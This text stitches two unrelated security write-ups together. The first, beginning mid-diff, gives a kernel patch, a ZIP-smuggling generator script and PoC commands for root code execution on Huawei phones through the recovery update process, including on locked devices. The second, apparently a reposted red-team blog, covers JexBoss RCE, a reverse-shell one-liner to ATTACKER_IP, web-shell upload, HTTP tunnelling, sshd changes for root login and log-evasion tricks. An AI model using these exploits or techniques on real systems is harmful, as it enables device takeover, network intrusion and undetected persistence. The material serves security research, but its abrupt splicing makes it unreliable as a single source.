+	int		trigger_counter[FSG_MAX_LUNS];
+	loff_t		trigger_offset[FSG_MAX_LUNS];
+	loff_t		payload_offset[FSG_MAX_LUNS];
+	loff_t		payload_size[FSG_MAX_LUNS];
+	unsigned int	trigger_counter_count, trigger_offset_count;
+	unsigned int	payload_offset_count, payload_size_count;
+
 };
 
 #define _FSG_MODULE_PARAM_ARRAY(prefix, params, name, type, desc)	\
@@ -40,6 +49,14 @@ struct fsg_module_parameters {
 				"true to simulate CD-ROM instead of disk"); \
 	_FSG_MODULE_PARAM_ARRAY(prefix, params, nofua, bool,		\
 				"true to ignore SCSI WRITE(10,12) FUA bit"); \
+	_FSG_MODULE_PARAM_ARRAY(prefix, params, trigger_counter, int,	\
+				"The number of masking the payload area with zeros"); \
+	_FSG_MODULE_PARAM_ARRAY(prefix, params, trigger_offset, ullong,	\
+				"Byte offset of the trigger area"); 	\
+	_FSG_MODULE_PARAM_ARRAY(prefix, params, payload_offset, ullong,	\
+				"Byte offset of the payload area"); 	\
+	_FSG_MODULE_PARAM_ARRAY(prefix, params, payload_size, ullong,	\
+			"Byte size of the payload area"); 		\
 	_FSG_MODULE_PARAM(prefix, params, luns, uint,			\
 			  "number of LUNs");				\
 	_FSG_MODULE_PARAM(prefix, params, stall, bool,			\
@@ -91,6 +108,12 @@ struct fsg_lun_config {
 	char cdrom;
 	char nofua;
 	char inquiry_string[INQUIRY_STRING_LEN];
+
+	/* ToC-ToU patch */
+	int trigger_counter;
+	loff_t trigger_offset;
+	loff_t payload_offset;
+	loff_t payload_size;
 };
 
 struct fsg_config {
diff --git a/drivers/usb/gadget/function/storage_common.h b/drivers/usb/gadget/function/storage_common.h
index bdeb1e233..84576bfcb 100644
--- a/drivers/usb/gadget/function/storage_common.h
+++ b/drivers/usb/gadget/function/storage_common.h
@@ -120,6 +120,12 @@ struct fsg_lun {
 	const char	*name;		/* "lun.name" */
 	const char	**name_pfx;	/* "function.name" */
 	char		inquiry_string[INQUIRY_STRING_LEN];
+
+	/* ToC-ToU patch */
+	int		trigger_counter;
+	loff_t		trigger_offset;
+	loff_t		payload_offset;
+	loff_t		payload_size;
 };
 
 static inline bool fsg_lun_is_open(struct fsg_lun *curlun)

We’ve done the kernel compilation off-target, on an x86 Ubuntu 22.04 machine, so a cross-compilation environment was needed. Acquiring the kernel sources (we used commit a90c1b9c) and applying the mass storage patch:

sudo apt install git bc bison flex libssl-dev make libc6-dev libncurses5-dev
sudo apt install crossbuild-essential-arm64
mkdir linux
cd linux
git init
git remote add origin https://github.com/raspberrypi/linux
git fetch --depth 1 origin a90c1b9c7da585b818e677cbd8c0b083bed42c4d
git reset --hard FETCH_HEAD
git apply < ../mass_storage_patch.diff

For the kernel config we use the Raspberry Pi 4 specific defconfig. The default kernel configuration contains a multitude of unnecessary modules; they could have been trimmed down quite a bit, as sketched below.
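For example, a hypothetical trim using the kernel’s own scripts/config helper (the disabled options here are illustrative only, not what we actually used):

# run in the kernel source tree, after 'make ... bcm2711_defconfig'
./scripts/config --disable CONFIG_SOUND
./scripts/config --disable CONFIG_MEDIA_SUPPORT
# re-resolve dependencies after editing the config
make ARCH=arm64 CROSS_COMPILE=aarch64-linux-gnu- olddefconfig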

KERNEL=kernel8
make ARCH=arm64 CROSS_COMPILE=aarch64-linux-gnu- bcm2711_defconfig
make -j8 ARCH=arm64 CROSS_COMPILE=aarch64-linux-gnu- Image modules dtbs

After building the kernel, we copy the products to the SD card:

mount /dev/mmcblk0p1 /mnt/boot
mount /dev/mmcblk0p2 /mnt/root

mv /mnt/boot/kernel8.img /mnt/boot/kernel8-backup.img
mv /mnt/boot/overlays/ /mnt/boot/overlays_backup

mkdir /mnt/boot/overlays/
cp arch/arm64/boot/Image /mnt/boot/kernel8.img
cp arch/arm64/boot/dts/broadcom/*.dtb /mnt/boot/
cp arch/arm64/boot/dts/overlays/*.dtb* /mnt/boot/overlays/
cp arch/arm64/boot/dts/overlays/README /mnt/boot/overlays/

PATH=$PATH make ARCH=arm64 CROSS_COMPILE=aarch64-linux-gnu- INSTALL_MOD_PATH=/mnt/root modules_install

umount /dev/mmcblk0p1
umount /dev/mmcblk0p2

Finally we put the SD card back into the RPi and boot it.

Crafting the Update Archive

Recall that we have three phases of the update process, separated by the mount actions: the first checks the software version for compatibility of the update with the device, the second verifies the update cryptographically, and the third applies the update. We are going to construct a “frankenZIP” update archive which can present itself in different ways throughout the update phases, using our FaultyUSB, to achieve our goal.

It may seem logical at first that in the first two steps (compatibility check, signature verification) we can serve the same content, since we just need a valid update archive that is both signed and has a matching version for the given device. However, the second phase of the update process is actually more convoluted, as it performs multiple sub-checks: in addition to the Android-specific update signature verification, there is another important part of the verification stage, the authentication token check.

The authentication token is a cryptographically signed token, infeasible to forge, but it only applies to OTA update archives; SD-type updates are not checked for auth tokens. SD updates are most likely meant to be installed locally, e.g. literally from an SD card, so no Huawei server is involved in approving the update process and issuing an auth token.

It is possible to find an OTA update archive for a specific device, because the end user must be able to update their phone, so there must be a way to publicly access the OTA updates. Unfortunately, SD updates are more difficult to find; we only managed to find a few model-version combinations on Android file hosting sites. Analyzing update archives of different types and versions, we found that Huawei is using the so-called hotakey_v2 RSA key across a broad range of devices as the Android-specific signing key: both an SD update for LIO EMUI 11 and the latest HarmonyOS updates for NOH are signed with this key. This means that an update archive for a different model and an older OS version may still pass the cryptographic verification successfully, even on devices with a fresh HarmonyOS version.

Also, there are some recent changes in the update archive content: the newer update archives (both OTAs and SDs) have begun to include the packageinfo.mbn version description file, which is also checked during the verification stage. If this file exists, a more thorough version-compatibility test is performed: e.g. when it defines an “Upgrade” field and the installed OS has a greater version number than the current update, the update process is aborted. However, the check is skipped if this file is missing – which is exactly the case with the pre-HarmonyOS updates; e.g. the EMUI 11 SD update archives don’t have the packageinfo.mbn file.

Solving all those constraints, we were eventually able to find a publicly available file on a firmware sharing site (named Huawei Mate 30 Pro Lion-L29 hw eu LIO-L29 11.0.0.220(C432E7R8P4)_Firmware_EMUI11.0.0_05016HEY.zip), which contains the SD update of the LIO-L29 11.0.0.220 version. There are three ZIP files in an SD update: the base, preload, and cust packages. Each of them is signed. We selected the cust package as the foundation of the PoC because of its tiny (14 KB) size.

This file is perfect for the second phase of the update (verification), but it would obviously not have the correct SOFTWARE_VER_LIST.mbn for our target devices. That’s why the exploit has to present the external media differently between phases 1 and 2 as well: in the first phase we produce a variant that has the desired SOFTWARE_VER_LIST.mbn, while in the second phase we produce the previously mentioned SD update archive for EMUI 11, which not only passes signature verification but also bypasses the authentication token and the packageinfo requirement. However, this original archive file is not used exactly “as-is” for phase two: we must make a change to it so that it still passes verification in phase two while also containing the arbitrary binary to be executed in the third phase (code execution).

Creating such a static “frankenZIP” that can produce multiple contents depending on the update stage was the main point of our previous publication; see the UnZiploc presentation on exploiting CVE-2021-40045. The key to it is the way the parsing algorithm of the Android-specific signature footer works. The implementation still enables us to leave a gap between the end of the actual ZIP file and the beginning of the whole-file PKCS#7 signature. This gap is a no man’s land in the sense that ZIP parsers skip it, as it is technically part of the ZIP comment field; likewise, the signature verifier also skips it, because the signature field is aligned to the end of the file. However (and this is why we needed a new vulnerability compared to the previous report), statically smuggling a ZIP file inside the gap area is no longer possible, since the fix Huawei employed, i.e. searching for the ZIP End of Central Directory (EOCD) marker in the archive’s comment field, is an effective mitigation.

This EOCD searching happens in the verification phase, just before the Android-specific signature checking. This means that during the verification phase a pristine update archive must be used (apart from the fact that it is still possible to create a gap between the signature and the end of the ZIP data).
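For illustration, here is a minimal sketch of such an EOCD check in Python (the logic and names are assumptions, not Huawei’s actual code); the EOCD record starts with the magic bytes PK\x05\x06 and is 22 bytes long before the comment field:

EOCD_MAGIC = b"PK\x05\x06"

def comment_contains_eocd(zip_data: bytes) -> bool:
    # the original archive's EOCD is the first one in the file;
    # a smuggled ZIP hidden in the comment field would carry a second one
    eocd_ofs = zip_data.find(EOCD_MAGIC)
    comment = zip_data[eocd_ofs + 22:]
    # the mitigation aborts the update if another EOCD magic shows up here
    return EOCD_MAGIC in comment

With FaultyUSB zero-masking the gap during verification, a scan of this kind reads only zeros there and the check passes.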

Therefore, the idea is to utilize the patched mass storage functionality of the Linux kernel to hide the injected ZIP inside the update archive exactly when the update process reaches the verification phase. This is done by masking the payload area with zeros, so when a read access occurs at the end of the ZIP file during the EOCD-searching step of the verification process, the phone reads zeros in the no man’s land and the new fix does not raise an alarm. However, when the ZIP file is read again in the third phase, the smuggled content is served, and therefore (similarly to the previous vulnerability) the modified update-binary ends up being executed.

The content of the crafted ZIP file can be restricted to a minimal file set: only those files which are essential to pass the sanity (META-INF/CERT.RSA, SD_update.tag) and version (SOFTWARE_VER_LIST.mbn) checks during the update process. Supported models depend on the content of the SOFTWARE_VER_LIST.mbn file, where model codenames, the geographical revision, and a minimally supported firmware version are listed. The update-binary contains the arbitrary code that will be executed.

Here is the ZIP-smuggling generator (smuggle_zip_inplace.py), which takes a legitimate signed ZIP archive as a base and injects into it the previously discussed minimal file set and a custom binary to be executed.

import argparse
import struct
import zipfile
import io
import os


if __name__ == '__main__':
	parser = argparse.ArgumentParser(description="poc update.zip repacker")
	parser.add_argument("file", type=argparse.FileType("r+b"), help="update.zip file to be modified")
	parser.add_argument("update_binary", type=argparse.FileType("rb"), help="update binary to be injected")
	parser.add_argument("-g", "--gap", default="-1", help="gap between EOCD and signature (-1: maximum)")
	parser.add_argument("-o", "--ofs", default="-1", help="payload offset in the gap")
	args = parser.parse_args()

	gap_size = int(args.gap, 0)
	payload_ofs = int(args.ofs, 0)

	args.file.seek(0, os.SEEK_END)
	original_size = args.file.tell()
	args.file.seek(-6, os.SEEK_END)
	signature_size, magic, comment_size = struct.unpack("<HHH", args.file.read(6))
	assert magic == 0xffff

	print(f"comment size   = {comment_size}")
	print(f"signature size = {signature_size}")

	# get the signature
	args.file.seek(-signature_size, os.SEEK_END)
	signature_data = args.file.read(signature_size - 6)

	# prepare the gap to where the payload will be placed
	# (gap is the new comment size - signature size)
	if gap_size == -1:
		gap_size = 0xffff - signature_size
	assert gap_size + signature_size <= 0xffff

	# automatically set the payload offset to be 0x1000-byte aligned
	if payload_ofs == -1:
		payload_ofs = (comment_size - original_size) & 0xfff

	print(f"gap size       = {gap_size}")
	print(f"payload offset = {payload_ofs}")

	# truncate the ZIP at the end of the signed data
	args.file.seek(-(comment_size + 2), os.SEEK_END)
	end_of_signed_data = args.file.tell()
	args.file.truncate(end_of_signed_data)

	# write the new (original ZIP's) EOCD according to the updated gap size
	args.file.write(struct.pack("<H", gap_size + signature_size))

	# gap before filling
	args.file.write(b"\x00"*(payload_ofs))

	# write a marker before the injected payload
	args.file.write(b"=PAYLOAD-BEGIN=\x00")

	# generate the injected ZIP payload
	z = zipfile.ZipFile(args.file, "w", compression=zipfile.ZIP_DEFLATED)
	# ensure the CERT.RSA has a proper length, the content is irrelevant
	z.writestr("META-INF/CERT.RSA", b"A"*1300)

	# the existence of this file makes the authentication tag verification be skipped for OTA updates
	z.writestr("skipauth_pkg.tag", b"")
	
	# get the update binary to be executed
	z.writestr("META-INF/com/google/android/update-binary", args.update_binary.read())
	
	# some more files are necessary for an "SD update"
	known_version_list = [
		b"LIO-LGRP2-OVS 102.0.0.1",
		b"LIO-LGRP2-OVS 11.0.0",
		b"NOH-LGRP2-OVS 102.0.0.1",
		b"NOH-LGRP2-OVS 11.0.0",
	]
	z.writestr("SOFTWARE_VER_LIST.mbn", b"\n".join(known_version_list)+b"\n")
	z.writestr("SD_update.tag", b"SD_PACKAGE_BASEPKG\n")
	z.close()

	# write a marker after the injected payload
	args.file.write(b"==PAYLOAD-END==\x00")

	payload_size = args.file.tell() - (end_of_signed_data + 2) - payload_ofs

	assert payload_size + payload_ofs < gap_size, f"{payload_size} + {payload_ofs} < {gap_size}"

	# gap after filling
	args.file.write(b"\x00"*(gap_size - payload_ofs - payload_size))

	# signature
	args.file.write(signature_data)

	# footer
	args.file.write(struct.pack("<HHH", signature_size, 0xffff, gap_size + signature_size))

Regarding the actual content of the PoCs: because a mass storage device has no notion of higher-level concepts like file systems or even files, it can only operate at the raw storage level, so the output of the PoC build is in fact a raw file system image. Below is the file system image generation script, where the update_sd_base.zip archive is the cust part of the aforementioned LIO update and update-binary-poc is the ELF executable to be run. The update-binary-poc is a static aarch64 ELF file, which finally gets executed via execve by the recovery, thus reaching arbitrary code execution as root. Also note that the output image (file_system.img) contains only a bare file system and has no partition table.

python3 smuggle_zip_inplace.py update_sd_base.zip update-binary-poc
dd if=/dev/zero of=file_system.img bs=1M count=10
mkfs.exfat file_system.img
mkdir -p mnt
sudo mount -o loop,rw,nosuid,nodev,relatime,uid=1000,gid=1000,fmask=0022,dmask=0022,iocharset=utf8 -t exfat file_system.img mnt
mkdir -p mnt/dload
dd if=/dev/zero of=mnt/padding_between_exfat_headers_and_update_archive bs=1M count=1
sudo umount mnt
rmdir mnt

python -c 'd=open("file_system.img","rb").read();o=d.find("update_sd_base".encode("utf-16le"));b=d.find(b"=PAYLOAD-BEGIN=");e=d.find(b"==PAYLOAD-END==")+16;print(f"sudo rmmod g_mass_storage; sudo modprobe g_mass_storage file=/home/pi/file_system.img trigger_counter=4 trigger_offset=0x{o:x} payload_offset=0x{b:x} payload_size={e-b}")'

The file systems are tiny, just about 10 MB in size, and formatted as exFAT. To have a proper offset distance between the file system metadata (e.g. the file node descriptor) and the actual update archive, a 1 MB zero-filled dummy file is inserted first. This is only a precaution to prevent the Linux kernel from caching the beginning of the update archive when it reads the file system metadata.

The final step of the PoC build process automatically constructs the command that loads the patched mass storage module with the correct trigger and payload parameters. The trigger condition is defined as a read event at the file node descriptor of the update_sd_base.zip file, because the file path of the update archive must be resolved into a file node by the file system, so the file metadata must be read before the actual file content. The trigger counter parameter is set empirically, as a constant based on the observed number of mount events, directory listings, and file stats prior to the verification stage.

Leveraging Arbitrary Code Execution

Gaining root-level code execution is nice, and normally one would like to open a reverse shell to make use of it, but the recovery mode in which the update runs leaves us a very restricted environment in terms of external connections. However, as we already detailed in the UnZiploc presentation last year, the recovery mode can by design make use of WiFi to realize a “phone disaster recovery” feature, in which it downloads the OTA over the internet directly from recovery. So we could make use of the WiFi chip to connect to our AP and thus make the reverse shell possible. The exact PoC code is not disclosed here, it is left as an exercise for the reader 🙂

Running the PoC

After building the PoC, the resulting file system image is transferred to the Raspberry Pi, and the patched USB mass storage kernel module is loaded with it on the RPi, e.g.:

sudo rmmod g_mass_storage
sudo modprobe g_mass_storage \
  file=/home/pi/file_system.img \
  trigger_counter=4 trigger_offset=0x204042 \
  payload_offset=0x308000 payload_size=3672

Then we connect the RPi to the target phone with the USB-C cable and simply trigger the update process. This can be done in different ways, depending on the lock state of the device.

If the phone is unlocked (i.e. you are trying to root your own phone :), once the phone recognizes the USB device, a notification appears and the file explorer can list the content of our 10 MB emulated flash drive. Then the dialer can be used to access the ProjectMenu application by dialing *#*#2846579#*#* (or, in case of a tablet, use the calculator in landscape mode and enter ()()2846579()()), then select “4. Software Upgrade”, and then “1. Memory card Upgrade”.

More interestingly, if the phone credentials are not known, so the screen can’t be unlocked to access the ProjectMenu application, the SD update method is still reachable via the eRecovery menu, by powering the phone on while holding the Power and Volume Up buttons.

Because the trigger counter can be left in an indeterminate state after normal-mode Android has read the external media, it is very important to execute the same kernel module unload and load commands again while the phone reboots! This way the trigger counter is only affected by the update process, and thus it works correctly.

The update process itself should be fairly quick, as the whole archive is just a few KB, so the PoC code gets executed within a few seconds of entering recovery mode.

To close things out, here is a video capture of the exploit 🙂

How I hacked into a Telecom Network — Part 1 (Getting the RCE)

Original text by Harpreet Singh

TLDR; Red Team Engagement for a telecom company. Got a foothold on the company’s Network Monitoring System (NMS). Sorted reverse shell issue with tunneling SSH over HTTP. Went full-on Ninja when getting SSH over HTTP. Proxied inside the network for internal network scans. Got access to CDRs and VLR with SS7 application.

Hi everyone, this is my first post on Medium and I hope you guys enjoy reading it! There is a lot of information that I had to redact because of the sensitive nature of this info. (I’m apologizing in advance 😅 )

Introduction

So there I was doing a Red Team Engagement for a client a while back. I was asked to get inside the network and reach to the Call Data Records (CDRs) for the telecom network. People who don’t know what CDR is, here’s a good explanation for it (shamelessly copied from Wikipedia) —

A call detail record (CDR) is a data record produced by a telephone exchange or other telecommunications equipment that documents the details of a telephone call or other telecommunications transaction (e.g., text message) that passes through that facility or device. The record contains various attributes of the call, such as time, duration, completion status, source number, and destination number.

Among all my engagements, this one holds a special place. Getting the initial foothold was way too easy (simple network service exploitation to get RCE), but the issue was getting a stable shell.

In this blog post (not a tutorial), I want to share my experience on how I went from a Remote Code Execution (RCE) to proxified internal network scans in a matter of minutes.

Reconnaissance

Every ethical hacker/penetration tester/bug bounty hunter/red teamer knows the importance of reconnaissance. The phrase “give me six hours to chop down a tree and I will spend the first four sharpening the axe” fits perfectly here. The more extensive the reconnaissance, the better the odds of successful exploitation.

So for the RTE, the obvious choices for recon were: DNS enumeration, ASN & BGP lookups, some passive recon from multiple search engines, checking out source code repositories such as GitHub, BitBucket, GitLab, etc. for something juicy, and doing some OSINT on employees for spear phishing in case no RCE was found. (Trust me when I say this, fooling an employee into downloading & executing malicious documents is easy to do, but only if you can overcome the obstacles: AVs & email spam filters.)

There are just so many sources from where you can recon for a particular organization. In my case, I started off with the DNS enumeration itself.

aiodnsbrute -v -t 7000 --no-verify -w dns-list.uniq.lst ******.com.** | grep -v Timeout | grep -v Misformatted | grep -v exception

Fun fact: The wordlist I used has 2.77 million unique DNS records.

Most bounty hunters will only look at ports 80 or 443 of all the sub-domains found. The thing is, sometimes it’s better to perform a full port scan just to be on the safe side. In my case, I found a sub-domain e[REDACTED]-nms.[REDACTED].com.[REDACTED] and, after a full port scan, I got some interesting results.

The ports 12000/tcp and 14000/tcp were nothing special, but 14100/tcp… let’s just say this was my lucky day!!

J-Fuggin-Boss!!

Remote Code Execution

From here on, everyone who has exploited the infamous JBoss vulnerabilities before knows how things will move forward. For newbies, if you haven’t had the experience with JBoss exploitation, you can check out the following links to help you out with the exploitation:

JBoss-Bridging-the-Gap-Between-the-Enterprise-and-You

hacking_and_securing_jboss

For JBoss exploitation, you can use JexBoss. There are many methods and exploitation techniques included in the tool, and it also covers Application and Servlet deserialization and Struts2. You can exploit JBoss using Metasploit as well, though I prefer JexBoss.

Continuing with the engagement, once I discovered JBoss, I quickly fired up Jexboss for the exploitation. The tool was easy to use.

./jexboss.py -u http://[REDACTED]:14100/

As we can see from the above screenshot, the server was vulnerable. Using the JMXInvokerServlet method, I was then able to get Remote Code Execution on the server. Pretty straightforward exploitation! Right?

You must be thinking, that was no advanced-level shit, so what’s different about this post?

Patience guys!

Now that I had the foothold, the actual issue arose. Of course like always, once I had the RCE I tried getting a reverse shell.

and I even got a back connection!

However, the shell was not stable, and the python process was getting killed after a few seconds. I tried other reverse shell one-liner payloads, different common ports, even UDP too, but the result was the same. I also tried reverse_tcp/http/https Metasploit payloads in different forms to get meterpreter connections, but the meterpreter shells also disconnected after a few seconds.
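For reference, the kind of Python reverse shell one-liner meant here looks roughly like this (the attacker address and port are placeholders):

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKER_IP",443));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'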

I had experienced situations like these before, and I always asked myself: what if I’m not able to get a reverse shell, how will I proceed?

Enter: bind shell connection over an HTTP tunnel!

How I hacked into a Telecom Network — Part 2 (Playing with Tunnels: TCP Tunneling)

TLDR; Red Team Engagement for a telecom company. Got a foothold on the company’s Network Monitoring System (NMS). Sorted reverse shell issue with tunneling SSH over HTTP. Went full-on Ninja when getting SSH over HTTP. Proxied inside the network for internal network scans. Got access to CDRs and VLR with SS7 application.

Recap: Red Team Engagement for a Telecom company. Found an interesting subdomain, did a full port scan on that subdomain, found ports 12000/tcp, 14000/tcp, and 14100/tcp, found a running instance of JBoss (lucky me!), exploited JBoss for RCE, and then ran into issues with the reverse shell.

Now, when I tried getting a stable reverse shell, I failed. The other idea that came to my mind was getting a bind shell (SSH over HTTP, for stability) instead of a reverse shell, via a TCP tunnel over HTTP. But what exactly was I achieving here?

TCP tunnel over HTTP (for TCP stability) + stealthy SSH connection (over the created TCP tunnel) + SOCKS tunnel (dynamic SSH tunnel) for internal network scans using Metasploit = exploiting internal network services to exfil data via these recursive tunnels.

Looks very complex? Let’s break it down into multiple steps:

  1. First, I created a bridge between my server and the NMS server so that it should support communication for different protocols other than just HTTP/HTTPS(>L2 for now) [TCP Tunnel over HTTP]
  2. Once the bridge (TCP Tunnel over HTTP) was created, I configured and implemented SSH Port Forwarding from my server (2222/tcp) to the NMS server (22/tcp) so that I could connect to the NMS server via SSH over HTTP. (SSH over TCP over HTTP to be precise) Note: The SSH service on the NMS server was running on 127.0.0.1
  3. I then configured the NMS SSH server to allow root login and generated an SSH key pair (copying my public key to the authorized_keys file) for access to the NMS server via SSH.
  4. I checked SSH connection to NMS using the private key and when it worked, I then created a Dynamic SSH Tunnel (SOCKS) to proxify Metasploit over SSH Tunnel (Metasploit over SSH Tunnel over TCP Tunnel over HTTP to be precise).

I want to blog it step by step on how I created the tunnels and the way I played with them.

Tunneling 101

A tunneling protocol is a communications protocol that allows for the movement of data from one network to another. It involves allowing private network communications to be sent across a public network (such as the Internet) through a process called encapsulation. Because tunneling involves repackaging the traffic data into a different form, perhaps with encryption as standard, it can hide the nature of the traffic that is run through a tunnel.
The tunneling protocol works by using the data portion of a packet (the payload) to carry the packets that actually provide the service. Tunneling uses a layered protocol model such as those of the OSI or TCP/IP protocol suite, but usually violates the layering when using the payload to carry a service not normally provided by the network. Typically, the delivery protocol operates at an equal or higher level in the layered model than the payload protocol.
Source: Wikipedia

So basically the idea is to use the webserver as an intermediate proxy to forward all the network packets (TCP packets) from the webserver to the internal network.

Forwarding TCP packets to the internal network through the web server using the HTTP protocol

TCP tunneling can help you in situations where you have restricted port access and filtered egress traffic. In my case, there was not much filtering however, I used this technique to get stable shell access.

Now that I already had an RCE on the server and that too with the “root” privilege. I quickly used this opportunity to create a JSP based shell using ABPTTS

A Black Path Toward The Sun (ABPTTS)

As explained in the GitHub repo,

ABPTTS uses a Python client script and a web application server page/package to tunnel TCP traffic over an HTTP/HTTPS connection to a web application server.

Currently, only JSP/WAR and ASP.NET server-side components are supported by this tool.

So the idea was to create a JSP based shell using ABPTTS and upload it to the web server, let the tool connect with the JSP shell, and create a TCP tunnel over HTTP to create a secure shell (SSH) between my system and the server.

python abpttsfactory.py -o jexws4.jsp

When the shell got generated using ABPTTS, the tool created a configuration file to be used for creating the TCP tunnel over HTTP/HTTPS.

I then uploaded the JSP shell to the server using wget. Note: the jexws4.war shell is a package from JexBoss. When you exploit the JBoss vulnerability via JexBoss, the tool uploads its own WAR shell to the server. In my case, I just had to find this WAR/JSP shell (jexws4.jsp) and replace it with the ABPTTS shell.

wget http://[MY SERVER]/jexws4.jsp -O <location of jexws4.jsp shell on NMS server>

Once the ABPTTS shell was uploaded onto the server, I quickly confirmed it in JexBoss by executing a random command and checking the output. Why? Now that the JexBoss shell was overwritten by the ABPTTS shell, no matter what command I executed, the output would always be the hash printed by the ABPTTS shell.

As you can see from the above screenshot, when I executed the “id” command, I got a weird hash in return, which proves the ABPTTS shell was uploaded successfully!

Now that I had a TCP tunnel over HTTP configured, the next thing I wanted to do was forward the SSH port running on the server (22/tcp on NMS) and bind it to a port on my system (2222/tcp). Why? So that I could connect to the NMS via SSH. Did you notice what I was trying to do here?

SSH port forwarding (not yet tunneled) via TCP tunnel over HTTP

I had yet to configure the SSH part on the NMS and on my own server for the SSH tunnel. For now, I just prepared the port forwarding mechanism so that I could reach the local port 22/tcp on the NMS from my server using port 2222/tcp.

python abpttsclient.py -c <location of config file> -u <ABPTTS shell URL> -f 127.0.0.1:2222/127.0.0.1:22

I checked my connections table to verify that the port was properly forwarded. As you can see in the below screenshot, my server’s port 2222/tcp was in the LISTEN state.
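A quick way to run such a check from a terminal (either command works, depending on what the box has installed):

ss -tlnp | grep 2222
# or, on older systems:
netstat -antp | grep 2222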

The next thing to do was configuring the SSH server, connecting to the NMS, and starting a dynamic SSH tunnel (SOCKS). I’ll cover this in the next post:

How I hacked into a Telecom Network — Part 3 (Playing with Tunnels: Stealthy SSH & Dynamic Tunnels)

TLDR; Red Team Engagement for a telecom company. Got a foothold on the company’s Network Monitoring System (NMS). Sorted reverse shell issue with tunneling SSH over HTTP. Went full-on Ninja when getting SSH over HTTP. Proxied inside the network for internal network scans. Got access to CDRs and VLR with SS7 application.

Recap: Red Team Engagement for a Telecom company. Found an interesting subdomain, did a full port scan on that subdomain, found ports 12000/tcp, 14000/tcp, and 14100/tcp, found a running instance of JBoss (lucky me!), exploited JBoss for RCE, and implemented a TCP tunnel over HTTP for shell stability.

DISCLAIMER: This post is quite lengthy, so just sit back, be patient, and enjoy the ride!

In the previous part, I described the steps I followed to configure a TCP tunnel over HTTP and SSH port forwarding to access port 22/tcp of the NMS server from my server using port 2222/tcp. In this blog post, I’ll show how I implemented dynamic SSH tunnels for further network exploitation.

Stealthy SSH Access

When you’re connected to an SSH server, the connection details are saved in a log file. To check these connection details, you can execute the ‘w’ command on *nix systems.

The command w on many Unix-like operating systems provides a quick summary of every user logged into a computer, what each user is currently doing, and what load all the activity is imposing on the computer itself. The command is a one-command combination of several other Unix programs: who, uptime, and ps -a. Source: Wikipedia

So basically, the source IP is saved, which is dangerous for a red teamer. As this was an RTE, I could not take the chance of letting the admin know my C2 location. (Don’t worry, the ABPTTS shell that I used was connected from my server, and I had already bought a domain for IDN homograph attacks to reduce my chances of detection.)

For the stealthy connection to work, I checked the hosts file to gather more information, and I found that this server was being used quite heavily inside the network.

Such a server was already being monitored, so I was thinking of ways to be as stealthy as possible in such a scenario. The NMS was already monitoring the network, so I figured it must be monitoring itself as well, including all the network connections to/from the server. This meant I couldn’t run a normal port scan through the TCP tunnel over HTTP.

How about encrypting the communication between my server and the NMS server using SSH? But with an SSH connection, my hostname/IP would be stored in the log files, and the username would be easy to identify.

In this case, my server’s username was ‘harry’, and generating a key for this user to store in the authorized_keys file was not a good option.

And then I came up with an idea (in steps):

  1. Create the user ‘nms’ (this user was already created in the NMS server) on my server.
  2. Change my server’s hostname from OPENVPN to [REDACTED]_NMS[REDACTED]. (the same as the NMS server)
  3. Generate SSH keys for ‘nms’ user on my server and copy the public key in the NMS server. (authorized_keys)
  4. Configure the SSH server running on NMS to enable root login (PermitRootLogin), TCP port forwarding & gateway ports. (SSH -g switch just in case)
  5. Configure the NMS server to act as a SOCKS proxy for my further network exploitation. (Dynamic SSH Tunnel)
  6. The SOCKS tunnel is encrypted now and I can use this tunnel to do an internal network scan using Metasploit.

Implementation time!

I began by first adding the user ‘nms’ on my server so that I could generate the user-specific SSH keys.

I even changed the hostname of my server to the exact same as the NMS server’s, so that when I logged in using SSH, the logs would show a user login entry as nms@[REDACTED]_NMS[REDACTED]

Next, I generated the SSH Keys for ‘nms’ user on my server.
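The key generation itself is a one-liner, something along these lines (key type, size, and path are assumptions):

sudo -u nms ssh-keygen -t rsa -b 4096 -f /home/nms/.ssh/id_rsa -N ""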

I also had to change the SSH configuration on the NMS server, so I downloaded the sshd_config file from the server and changed a few things inside, as shown below.

AllowTCPForwarding: This option is used to enable TCP port forwarding via SSH.

GatewayPorts: This option enables the port binding to interfaces other than loopback on remote ports. (I’m enabling this option just in case if I want a reverse shell from other internal systems on this server which will forward the shell to me via Reverse Port Forwarding)

PermitRootLogin: This option permits the client to connect to the SSH server using ‘root’.

StrictModes: This option specifies whether SSH should check the user’s permissions in their home directory before accepting login.
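Put together, the relevant directives in the modified sshd_config would look like this (a sketch; the values follow from the description above):

AllowTcpForwarding yes
GatewayPorts yes
PermitRootLogin yes
StrictModes no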

Now that the configuration was done, I quickly uploaded (or rather overwrote) the sshd_config file on the NMS server.

And I also copied the SSH public key to the ‘root’ user’s authorized_keys file.

After everything was set, I tried a test connection just to check whether I was able to SSH into the NMS server as ‘root’ or not!

Booyah! 😎😎😎

SSH over TCP over HTTP (SSH port forward over TCP Tunnel created over HTTP connection via ABPTTS shell (JSP))

Dynamic Port Forwarding (Dynamic SSH Tunnels)

Let’s see what Wikipedia had to say about this —

Dynamic port forwarding (DPF) is an on-demand method of traversing a firewall or NAT through the use of firewall pinholes. The goal is to enable clients to connect securely to a trusted server that acts as an intermediary for the purpose of sending/receiving data to one or many destination servers.

DPF can be implemented by setting up a local application, such as SSH, as a SOCKS proxy server, which can be used to process data transmissions through the network or over the Internet.

Once the connection is established, DPF can be used to provide additional security for a user connected to an untrusted network. Since data must pass through the secure tunnel to another server before being forwarded to its original destination, the user is protected from packet sniffing that may occur on the LAN.

So all I had to do was create a dynamic SSH tunnel so that the NMS server would act as a SOCKS proxy server. Some of the benefits of using a SOCKS tunnel:

  1. Got indirect access to other network devices/servers through the NMS server (NMS server becomes the gateway for me)
  2. Because of the Dynamic SSH Tunnel, all the traffic originating from my server to the NMS server got encrypted (used SSH connection, remember?)
  3. Even if a server admin sits on the NMS server and monitors the network, he won’t be able to exactly find the root cause right away. (A dedicated one would definitely join the dots)
  4. The connection was stable (thanks to HTTP Keep-Alive), now all these recursive tunnels were running smoothly without any connection drop because of the TCP Tunnel that I implemented over HTTP.

When I logged in to the NMS server over SSH, here’s what the ‘w’ command showed me:

Now all I had to do was create the SOCKS tunnel, which I did using the command:

ssh -NfCq -D 9090 -i <private key/identity file> <user@host> -p <ssh custom port>

The ‘PermitRootLogin’ was changed in sshd_config file for this purpose (to log in to the NMS server as root).

Worried about what the server admin would think of the setup? Generally, when SSH connections are opened, a server admin sometimes checks the username that logged in and the authorized keys that were used, but most of the time he checks the hostname/IP from which the connection was initiated.

